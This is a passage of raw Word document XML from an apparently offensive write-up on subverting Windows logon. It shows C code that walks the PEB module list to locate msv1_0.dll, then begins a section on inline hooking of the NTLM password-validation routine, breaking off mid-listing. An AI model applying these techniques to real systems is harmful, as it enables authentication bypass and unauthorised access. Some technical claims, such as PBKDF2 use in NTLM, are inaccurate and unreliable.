          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ModuleListHead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>= &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Peb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Ldr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>InLoadOrderModuleList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12970D91" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="245" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PLIST_ENTRY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentEntry</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ModuleListHead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Flink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F03E4E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ModuleListHead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66930CE0" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PLDR_DATA_TABLE_ENTRY Entry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261E5B6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="520" w:lineRule="auto"/>
        <w:ind w:left="445" w:right="0" w:firstLine="418"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CONTAINING_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>RECORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>LDR_DATA_TABLE_ENTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>InLoadOrderLinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DllName</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Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>BaseDllName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B64604" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wcscmp</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DllName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>L"msv1_0.dll"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8EB8F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="4080" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Found the authentication DLL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PVOID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DllBase</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Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DllBase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A619A33" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="858" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D657AC8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="242" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492425D8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentEntry</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CurrentEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Flink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D6FCC" w14:textId="6896A5B2" w:rsidR="00AD5226" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="65" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446FCDBB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="22" w:right="673"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Logic Subversion: Inline Hooking of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AuthenticationFunctions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10345807" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The final phase is where the actual authentication subversion occurs. This is where abstract system concepts meet concrete assembly language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321B6E5" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.1 Understanding NTLM Password Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F724B6D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>NTLM (NT LAN Manager) is Windows’ primary local authentication mechanism. When a user logs in with a password, NTLM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC48570" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hashes the password: </w:t>
      </w:r>
      <w:r>
        <w:t>The plaintext password is hashed using MD4 (or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344008CF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="527" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>PBKDF2 on modern systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EAEFD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Compares the hash: </w:t>
      </w:r>
      <w:r>
        <w:t>The computed hash is compared against the stored hash in the SAM database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABE5D2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sets status code: </w:t>
      </w:r>
      <w:r>
        <w:t>The validation function returns a status indicating success (0x00000000) or failure (0xC000006A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069C6ED4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msv1_0.dll!MsvpPasswordValidate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A545DB5" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This is the function responsible for the comparison. Its general structure is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519BC66A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="430" w:right="4916" w:hanging="418"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">NTSTATUS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MsvpPasswordValidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WCHAR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ProvidedPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6017AC4B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>StoredPasswordHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0739A6A5" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAC2E9" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Hash the provided password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD43C9D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="238" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MD4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ProvidedPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
